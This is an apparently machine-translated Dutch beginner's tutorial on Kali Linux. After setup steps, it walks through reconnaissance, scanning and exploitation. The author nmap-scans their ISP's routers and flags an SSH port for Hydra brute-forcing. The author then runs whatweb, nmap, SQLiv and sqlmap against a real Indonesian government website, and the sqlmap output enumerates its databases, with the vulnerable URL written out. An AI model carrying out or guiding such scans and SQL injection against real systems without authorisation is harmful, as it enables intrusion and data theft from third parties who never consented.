Kali Linux-zelfstudie

Kali Linux Tutorial



Als je een expert bent of op zijn minst bekend bent met Linux, commando's en omgeving, net Kali Linux op je machine hebt geïnstalleerd, een Master of Kali Linux of een Ethical Hacker wilt worden, dan ben je hier aan het juiste adres. In dit artikel zal ik een Kali Linux-tutorial behandelen voor Linux-gebruikers die nog niet bekend zijn met Kali en u op weg helpen met enkele van de basistechnieken die worden gebruikt voor hacking en beveiligingstests tijdens het gebruik van Kali.

Wat is Kali Linux?

Kali Linux, ( voor het eerst uitgebracht op 13 maart 2013 ), dat formeel bekend stond als BackTrack, ontwikkeld door het beveiligingsbedrijf Offensive Security, is een forensische en op beveiliging gerichte distributie gebaseerd op de Testing-tak van Debian. Kali Linux is ontworpen met het oog op penetratietesten, gegevensherstel en detectie van bedreigingen. Het project schakelde eerder dit jaar over op een rolling release-model in een poging om meer up-to-date beveiligingshulpprogramma's te bieden aan de gebruikers van de distributie. Kali Linux is gratis en zal dat altijd blijven. Het heeft meer dan 600 penetratietesttools inbegrepen.







Waarom Kali Linux? Is het geschikt voor u?

Kali Linux is de laatste tijd enorm populair geworden. En daar zit een reden achter. Hacken is terug als cool-ding-to-do in de populaire cultuur en dit kan aanzienlijk worden toegeschreven aan de tv-serie Mr. Robot. De populariteit van Mr. Robot hielp Kali Linux bij het verkrijgen van nieuwe gebruikers. Mensen met nauwelijks kennis van Linux of iets dat met computerbeveiliging te maken heeft, proberen nu Kali als hun belangrijkste Linux-distributie te gebruiken.



Onze meest geavanceerde penetratietestdistributie ooit. – Kali Linux-ontwikkelaars. (Het staat op de hoofdpagina van Kali.org helemaal bovenaan de pagina.) Wat haal je uit die verklaring? Merk je dit op: APTD (Advanced Penetration Testing Distribution)? Er is hier geen term hacking letterlijk. Kali Linux is hetzelfde als andere Linux-distributies. Simpel gezegd, het is een Linux-distributie boordevol beveiligingsgerelateerde tools en gericht op netwerk- en computerbeveiligingsexperts. Het gebruik van Kali Linux is echter alleen gericht op beveiliging en forensisch onderzoek.



Een Linux-distributie is niets meer dan een bundel met daarin de Linux-kernel, een set kernhulpprogramma's en applicaties en enkele standaardinstellingen. Kali Linux biedt dus niet iets unieks in die zin dat de meeste van de meegeleverde tools op elke Linux-distributie kunnen worden geïnstalleerd.





Kali Linux is specifiek afgestemd op de vereisten van professionele penetratietesten en beveiligingsaudits. Het is gericht op een bepaalde subset van Linux-gebruikers. Pentesters, hackers, enz. Het is geen aanbevolen distributie als u Kali verwacht voor Linux-desktops voor algemene doeleinden voor ontwikkeling, webdesign, gaming, kantoor, enz. Kali kan u enkele uitdagingen geven, zelfs als u een ervaren Linux-gebruiker bent .

WAT U MOET DOEN NA HET INSTALLEREN VAN KALI LINUX

Na het installeren van Kali Linux, vraag je je misschien af ​​wat je hiermee moet doen, toch?. Iedereen heeft met dit probleem te maken, maak je geen zorgen.



STAP 1: DE REPOSITOR INSTELLEN

Ten eerste weet je dit misschien al, maar het is van cruciaal belang om de repository correct in te stellen. Zoals ik al zei, is het Kali Linux rolling release-model in een poging om meer up-to-date beveiligingshulpprogramma's te bieden aan de gebruikers van de distributie. Over het algemeen verwijst de repository, als je Kali Linux vers hebt geïnstalleerd, naar de media die je gebruikt om te installeren. Om dit op te lossen, moet je de repository wijzigen in de officiële Kali Linux-repository. Het benodigde bestand bevindt zich onder /etc/apt/sources.list . Open het bestand met de leafpad-teksteditor en vervang de standaardrepository naar deze officiële Kali Rolling-repository:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

STAP 2: UPDATE EN UPGRADE UW KALI LINUX

Na die update en upgrade je systeem, synchroniseer je Kali Linux naar de nieuwste versie. Open hiervoor de terminal en typ:

apt update -y && apt upgrade -y && apt dist-upgrade 

De opdracht apt update downloadt en haalt de pakketlijsten op uit de repositories en werkt deze bij om informatie te krijgen over de nieuwste versies van pakketten en hun afhankelijkheden.

Het apt upgrade-commando downloadt en installeert een nieuwere versie van de pakketten van geïnstalleerde Kali Linux-pakketten zolang het geen fouten op afhankelijkheden bevat.

De apt dist-upgrade zal alle pakketten bijwerken naar de nieuwste beschikbare versie, wat er ook gebeurt. En installeer en verwijder ook afhankelijkheden indien nodig (installeer afhankelijkheden om aan pakketten te voldoen, uiteraard, maar verwijder ook afhankelijkheden die verweesd werden als een pakket dat werd bijgewerkt de afhankelijkheid niet langer nodig had.

BASIS CONCEPT PENETRATIE TEST MET KALI LINUX

Nadat je die stappen met succes hebt uitgevoerd, zijn er drie belangrijke dingen die je met Kali Linux kunt doen op basis van het beoogde systeem, waaronder:

  1. Draadloos netwerk hacken – Wifi-hacking, Phising, ARP-vergiftiging, enz.
  2. Hacken van webapps – SQL-injectie, Cross-Site Request Forgery (CSRF), Web Phising, enz.
  3. Apparaat hacken - Maak gebruik van de doelmachine om er controle over te krijgen.

Ik neem IoT-hacking niet mee, het betekent niet dat Kali Linux daartoe niet in staat is. Maar het kan letterlijk ook bij Device Hacking horen. Omdat het apparaat fysiek uiterlijk en vorm heeft. In deze tutorial heb ik de basiskennis ervan behandeld. Omdat Kali Linux enorm is, past het niet in één artikel!

U moet ook de penetratietestcyclus of procedure kennen. Zij zijn:

  1. Verkenning – Informatie verzamelen
  2. Scannen
  3. Operatie
  4. Post-exploitatie

DRAADLOOS NETWERK HACKEN MET KALI LINUX

Wat betreft het hacken van draadloze netwerken, kan het slachtoffer verschillen. Omdat draadloze netwerken uit verschillende dingen bestaan, zoals ISP (Internet Service Provider), de router en zijn partners (modem, hub, switch, enz.) En de clients (gebruikers, CCTV, externe computer, enz.). Ze hebben ook kwetsbare mogelijkheden.

Het internet is een grote en complexe verzameling netwerkhardware, met elkaar verbonden door gateways. Het volgen van de route die uw pakketten volgen, is belangrijk om te weten hoe u een bepaalde hostnaam of doel-IP-adres bereikt.

Kali Linux heeft een ingebouwde tool genaamd Traceroute. Traceroute gebruikt het IP-protocol time-to-live-veld en probeert een ICMP TIME_EXCEEDED-reactie uit te lokken van elke gateway langs het pad naar een host. Traceroute probeert de route te traceren die een IP-pakket zou volgen naar een internethost door testpakketten te starten met een kleine TTL (time to live) en vervolgens te luisteren naar een ICMP-tijdsoverschrijding van het antwoord van een gateway. Ik zal u een voorbeeld geven hoe u een ISP-router kunt traceren die wordt gebruikt om onze verbinding af te handelen met behulp van Traceroute.

1. Erkenning

Het verzamelen van informatie is de belangrijkste start, mis deze stap niet. In deze stap is ons doel om zoveel mogelijk nuttige informatie te verkrijgen die we zouden kunnen krijgen, en deze informatie wordt vervolgens gebruikt voor verdere stappen.

Open eerst een terminal en typ deze opdracht om de weg naar de site te volgen, in dit geval stel ik de site in op google.com.

traceroute google.com 

Traceroute-schermafbeelding

2. Scannen

Zodra we de commando's hebben gestart, wordt vermeld waar ons pakket in volgorde naartoe gaat. Zoals je hierboven kunt zien, heb ik 3 hops, waarvan een mijn ISP-server is. Het eerste IP-adres op de lijst is mijn router, die als gateway fungeert. En de volgende twee zijn van mijn ISP. Laten we nu de service controleren die ze gebruiken met Nmap. Dus de doelen die we gaan scannen zijn: 10.152.192.1 en 10.13.223.102 . In de terminal heb ik het volgende commando uitgevoerd:

nmap -v -sS [IP Target] -Pn 

Laten we het argument van de opdracht opsplitsen:

-v = Breedsprakigheid inschakelen

-sS = TCP SYN-scantechniek gebruiken

-Pn = Behandel alle hosts als online - sla hostdetectie over

En hier is het resultaat dat we hebben gekregen.

nmap-schermafbeelding 2

Helaas, alle poorten aan 10.152.192.1 worden gefilterd, betekent dit dat alle inkomende TCP-verbindingen worden geblokkeerd door IDS of Firewall op dit IP. Laten we nu nog een scan maken naar het tweede doelwit.

nmap-schermafbeelding 1

3. Bediening:

In deze procedure ben ik niet bedoeld om de echte uitbuiting uit te voeren, in plaats daarvan laat ik je zien hoe. Op basis van het bovenstaande Nmap-scanresultaat weten we dat dit IP-adres een SSH-server op poort 22 heeft en dat deze open is. Het staat open voor bruteforce, haha! We hebben het gat gevonden, deze SSH-server is het mogelijke gat waar we toegang tot kunnen krijgen. Er zijn verschillende tools in Kali Linux die bruteforce- of woordenboekaanvallen tegen het SSH-protocol ondersteunen. De meest populaire en krachtige is Hydra.

Oké, dat was een basisprocedure voor het uitvoeren van een penetratietest tegen een gerichte server, wat in ons voorbeeld hier mijn ISP-server is.

WEB-APPS HACKEN MET KALI LINUX

Als je hier een passie voor hebt, kun je je hackomgeving opzetten door DWVA (Damn Vulnerable Web App) in je Kali Linux te installeren. Het is een PHP/MySQL-webtoepassing met een heleboel kwetsbare gaten. De belangrijkste doelen zijn om een ​​hulpmiddel te zijn voor beveiligingsprofessionals om hun vaardigheden en tools in een juridische omgeving te testen, en om webontwikkelaars te helpen de processen voor het beveiligen van webapplicaties beter te begrijpen. Je kunt DWVA hier gratis krijgen op Github: https://github.com/ethicalhack3r/DVWA.

Voor nu zal ik je laten zien hoe je Web Apps Hacking op een echte site kunt doen. Maar beloof me dat het beperkt is tot alleen educatieve doeleinden. We zullen een echte aanval op een echte site simuleren met behulp van SQL-injectie.

Voorwaarde

Gereedschap gedekt:

– Whatweb (voorgeïnstalleerd)

– Nmap (voorgeïnstalleerd)

– SQLiv (handmatig installeren)

– SQLMap (vooraf geïnstalleerd)

We hebben nog een extra tool nodig die hier beschikbaar is op Github: https://github.com/Hadesy2k/sqliv, installeer het eerst op onze Kali Linux. Deze tool genaamd SQLiv kan gericht scannen door een specifiek domein aan te bieden (met crawling). Typ de terminal in:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Doel: www.treggalekkab.go.id

1. Erkenning

Verzamel zoveel mogelijk nuttige informatie als we kunnen krijgen. We kunnen de webpagina openen en detecteren welke applicatie op deze site draait. Laten we eerst eens kijken wat voor soort website het is. We gaan Whatweb gebruiken om dat te doen.

whatweb www.trenggalekkab.go.id 

Welke web-screenshot

Zoals u het resultaat hierboven kunt zien, bevindt het doelwit zich in Indonesië. Het draait Apache v2.2.27 op zijn webserver en heeft ook PHP v5.4.31 , het heeft een IP-adres 103.247.21.142 . Oké, noteer dat. Mogelijk moet u de webpagina bezoeken, op zoek naar het bestand of de pagina die is gemaakt, de URL-parameters of zelfs het inlogformulier. Voor nu hebben we dat IP-adres nodig voor de volgende stap, namelijk scannen.

2. Scannen

Zoals eerder gebruiken we Nmap opnieuw om te scannen welke poorten en services op het doel draaien.

nmap -v -sS 103.247.21.142 

En hier is het resultaat dat we kregen:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Er zijn een heleboel open poorten die elke service op het doel afhandelen, maar degene die in het oog springt, is die mysql-service op poort 3306. Er wordt aangegeven dat deze site gebruikmaakt van mysql om hun informatie in databases te beheren. Dan vraag ik me af of er kwetsbaarheden voor SQL-injectie op deze site zijn. Dus scan ik de site opnieuw met SQLiv die we zojuist hebben geïnstalleerd. Ik typte het commando:

sqliv -t www.trenggalekkab.go.id 

SQLHacken ScreenShot1

We hebben 2 mogelijke SQL-kwetsbare URL's op deze site gevonden. Noteer die URL's.

3. Bediening:

Ok, we hebben SQL-kwetsbare URL's en klaar voor uitvoering. Om dat te doen zullen we SQLMap gebruiken. De syntaxis is:

sqlmap [Vulnerable URL] --dbs 

De opdracht zou er als volgt uit moeten zien:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Het argument –dbs is om SQLMap te vertellen om doeldatabases te verkrijgen. Hier is de output die we hebben gekregen:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap heeft 2 databases gevonden, maar slechts één daarvan bevat gevoelige gegevens, zoals een beheerdersreferentieaccount. Dat is op trengkab_trg. Nadat we de databases hebben gevonden, moeten we nog een stap doen. Dat is om de tabellen en kolommen te vinden en de laatste stap is om de gegevens te dumpen. Ik zal u hier in deze sectie niet laten zien hoe u dit doel gebruikt. Je kent tenminste het basisidee van de aanvalscyclus en het gebruik van enkele hulpmiddelen.

APPARAAT HACKEN

In een toekomstig artikel op deze site zullen we het hacken van apparaten behandelen, houd ons in de gaten. Als waarschuwing vooraf moet je ervoor zorgen dat je wat Python kent hiervoor.